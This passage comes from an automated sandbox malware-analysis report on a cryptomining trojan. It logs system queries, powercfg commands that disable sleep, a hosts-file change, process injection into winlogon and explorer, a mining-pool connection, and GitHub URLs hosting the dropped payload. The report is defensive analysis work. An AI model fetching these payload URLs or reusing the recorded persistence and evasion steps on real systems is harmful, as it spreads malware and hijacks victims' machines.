                      Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: winlogon.exe, 00000016.00000000.2408863317.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000016.00000002.3606414486.000001E858D81000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 00000021.00000002.3622373759.0000011605EC1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E8589636F0 cpuid 22_2_000001E8589636F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\dialer.exeCode function: 17_2_0000000140001B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,17_2_0000000140001B54
                      Source: C:\Windows\System32\winlogon.exeCode function: 22_2_000001E858987960 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,22_2_000001E858987960
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Modifies power options to not sleep / hibernate
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                      Source: C:\Windows\SysWOW64\system64x.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                      Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      Modifies the hosts file
                      Source: C:\Windows\SysWOW64\system64x.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: dialer.exe, 0000002F.00000002.3603906840.0000025545DE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      File and Directory Permissions Modification                      		1
                      Credential API Hooking                      		1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Native API                      		11
                      Windows Service                      		1
                      Access Token Manipulation                      		11
                      Disable or Modify Tools                      		LSASS Memory3
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Credential API Hooking                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Service Execution                      		Logon Script (Windows)11
                      Windows Service                      		1
                      Deobfuscate/Decode Files or Information                      		Security Account Manager24
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
                      Process Injection                      		21
                      Obfuscated Files or Information                      		NTDS441
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                      Software Packing                      		LSA Secrets2
                      Process Discovery                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials141
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      File Deletion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job4
                      Rootkit                      		Proc Filesystem1
                      Remote System Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt121
                      Masquerading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron141
                      Virtualization/Sandbox Evasion                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                      Access Token Manipulation                      		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
                      Process Injection                      		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                      Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                      Hidden Files and Directories                      		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1473042 Sample: SecuriteInfo.com.Win32.Malw... Startdate: 14/07/2024 Architecture: WINDOWS Score: 100 76 monerooceans.stream 2->76 78 gulf.moneroocean.stream 2->78 80 3 other IPs or domains 2->80 116 Malicious sample detected (through community Yara rule) 2->116 118 Antivirus / Scanner detection for submitted sample 2->118 120 Multi AV Scanner detection for submitted file 2->120 122 15 other signatures 2->122 9 SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe 14 15 2->9         started        14 updater.exe 2->14         started        signatures3 process4 dnsIp5 86 github.com 140.82.121.3, 443, 49727, 49728 GITHUBUS United States 9->86 88 raw.githubusercontent.com 185.199.109.133, 443, 49729 FASTLYUS Netherlands 9->88 70 C:\Windows\SysWOW64\system64x.exe, PE32+ 9->70 dropped 72 SecuriteInfo.com.W...17013.17645.exe.log, CSV 9->72 dropped 124 Drops executables to the windows directory (C:\Windows) and starts them 9->124 126 Found suspicious powershell code related to unpacking or dynamic code loading 9->126 128 Loading BitLocker PowerShell Module 9->128 136 2 other signatures 9->136 16 system64x.exe 1 3 9->16         started        74 C:\Windows\Temp\voeeoiqrjnla.sys, PE32+ 14->74 dropped 130 Antivirus detection for dropped file 14->130 132 Multi AV Scanner detection for dropped file 14->132 134 Protects its processes via BreakOnTermination flag 14->134 138 4 other signatures 14->138 20 dialer.exe 14->20         started        22 dialer.exe 14->22         started        25 powershell.exe 14->25         started        27 6 other processes 14->27 file6 signatures7 process8 dnsIp9 66 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 16->66 dropped 68 C:\Windows\System32\drivers\etc\hosts, ASCII 16->68 dropped 90 Antivirus detection for dropped file 16->90 92 Multi AV Scanner detection for dropped file 16->92 94 Uses powercfg.exe to modify the power settings 16->94 112 4 other signatures 16->112 29 dialer.exe 1 16->29         started        32 powershell.exe 23 16->32         started        34 cmd.exe 1 16->34         started        42 8 other processes 16->42 96 Injects code into the Windows Explorer (explorer.exe) 20->96 98 Writes to foreign memory regions 20->98 100 Allocates memory in foreign processes 20->100 114 2 other signatures 20->114 44 12 other processes 20->44 82 monerooceans.stream 149.102.143.109, 10128, 49734 COGENT-174US United States 22->82 84 wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org 172.67.206.184, 443, 49735, 49744 CLOUDFLARENETUS United States 22->84 102 Query firmware table information (likely to detect VMs) 22->102 104 Found strings related to Crypto-Mining 22->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 22->106 108 Loading BitLocker PowerShell Module 25->108 36 conhost.exe 25->36         started        38 conhost.exe 27->38         started        40 conhost.exe 27->40         started        46 4 other processes 27->46 file10 110 Detected Stratum mining protocol 82->110 signatures11 process12 signatures13 140 Contains functionality to inject code into remote processes 29->140 142 Writes to foreign memory regions 29->142 144 Allocates memory in foreign processes 29->144 148 3 other signatures 29->148 48 winlogon.exe 29->48 injected 62 3 other processes 29->62 146 Loading BitLocker PowerShell Module 32->146 50 conhost.exe 32->50         started        52 conhost.exe 34->52         started        54 wusa.exe 34->54         started        56 conhost.exe 42->56         started        58 conhost.exe 42->58         started        60 conhost.exe 42->60         started        64 5 other processes 42->64 process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe47%ReversingLabsWin32.Trojan.Boxter
                      SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe100%AviraTR/Redcap.owywe
                      SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\SysWOW64\system64x.exe100%AviraTR/Kryptik.byulc
                      C:\ProgramData\Google\Chrome\updater.exe100%AviraTR/Kryptik.byulc
                      C:\ProgramData\Google\Chrome\updater.exe92%ReversingLabsWin64.Packed.Generic
                      C:\Windows\SysWOW64\system64x.exe92%ReversingLabsWin64.Packed.Generic
                      C:\Windows\Temp\voeeoiqrjnla.sys5%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://nuget.org/NuGet.exe0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                      http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                      https://contoso.com/License0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                      http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                      https://contoso.com/0%URL Reputationsafe
                      https://nuget.org/nuget.exe0%URL Reputationsafe
                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://github.com0%Avira URL Cloudsafe
                      https://github.com/Pester/Pester0%Avira URL Cloudsafe
                      https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php0%Avira URL Cloudsafe
                      https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true0%Avira URL Cloudsafe
                      http://docs.oasis-open.org/ws-sx/ws-securitypolicy/2007020%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/wsdl/erties0%Avira URL Cloudsafe
                      http://www.microsoft.coA0%Avira URL Cloudsafe
                      https://172.94.1q0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2004/09/policy0%Avira URL Cloudsafe
                      https://wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org/api/endpoint.php--cinit0%Avira URL Cloudsafe
                      http://github.com0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/wsdl/soap12/0%Avira URL Cloudsafe
                      https://github.com(0%Avira URL Cloudsafe
                      http://schemas.xmlsoap.org/ws/2005/07/securitypolicy0%Avira URL Cloudsafe
                      https://raw.githubusercontent.com0%Avira URL Cloudsafe
                      https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5h0%Avira URL Cloudsafe
                      http://raw.githubusercontent.com0%Avira URL Cloudsafe
                      https://github.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe0%Avira URL Cloudsafe
                      http://3csp.icrosof4m/ocp00%Avira URL Cloudsafe
                      https://raw.githubusercontent.com/231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe0%Avira URL Cloudsafe
                      https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
